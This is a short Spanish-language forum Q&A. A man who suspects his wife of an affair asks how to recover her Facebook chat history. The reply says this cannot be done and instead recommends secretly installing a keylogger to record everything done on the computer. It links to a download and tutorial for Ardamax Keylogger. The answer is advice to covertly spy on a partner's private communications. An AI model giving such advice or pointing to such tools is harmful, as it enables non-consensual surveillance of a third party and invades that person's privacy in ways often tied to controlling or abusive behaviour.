¿Cómo recuperar el historial en facebook?

Hola que tal. Tengo un problema, he pillado a mi mujer chateando a escodindas con un amigo común y se que hay algo entre ellos, ella me jura y me rejura que no, pero no me fio. Mi pregunta si es posible recuperar el historial de conversaciones del chat en facebook. Me harías un gran favor si me contestaras, gracias.
Respuesta
No, no se puede, aunque puedes recurrir a programas logger, que registran todas las actividades realizadas en el computador que se instale.
Te remito a una fuente donde puedes descargarlo y configurarlo.
http://www.taringa.net/posts/downloads/3117806/Descarga-y-tutorial---ardamax-keylogger.html